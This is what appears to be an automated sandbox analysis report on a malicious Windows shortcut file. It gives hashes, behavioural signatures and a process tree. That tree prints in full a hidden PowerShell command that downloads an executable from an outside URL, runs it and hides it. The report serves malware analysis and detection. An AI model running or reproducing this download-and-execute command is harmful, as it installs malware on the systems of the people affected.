Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 21:06
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.lnk
Resource
win7-20240704-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
MalwareBazaar.lnk
Resource
win10v2004-20240802-en
windows10-2004-x64
19 signatures
150 seconds
General
-
Target
MalwareBazaar.lnk
-
Size
2KB
-
MD5
8d2464bee26f6e3d7c43953cfb3eebae
-
SHA1
906f5952737b7b6f15abaaaca1a4c22111d39338
-
SHA256
49b2caa0106ae7c87c555dfc3a919f2c1c4f1074e605b4c220fe3c85e7d2052e
-
SHA512
5e75b583648ddfe7f34da44d2d4188cd9663e51b5a6f773539d43cf0269ca511a5fd7e922ade8438ea3f7ec5ce6f48cdbd7b2a3cdcdff43fe78ccd61dee7e53e
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/bzdjgbsdzjkngdsnhgtuonidsgtsgb/neio.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2748 PoWeRsHeLl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2748 PoWeRsHeLl.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2748 PoWeRsHeLl.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2292 wrote to memory of 2748 2292 cmd.exe 31 PID 2292 wrote to memory of 2748 2292 cmd.exe 31 PID 2292 wrote to memory of 2748 2292 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -HiDdEn --hiDDeN ---HiddeN ----HidDEn -Command msadp32.acm;(new-object System.Net.WebClient).DownloadFile('http://www.requimacofradian.site/dfjbhskdbfvsdsfgsh/bzdjgbsdzjkngdsnhgtuonidsgtsgb/neio.exe','doubles.exe');./'doubles.exe';(get-item 'doubles.exe').Attributes += 'Hidden';2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-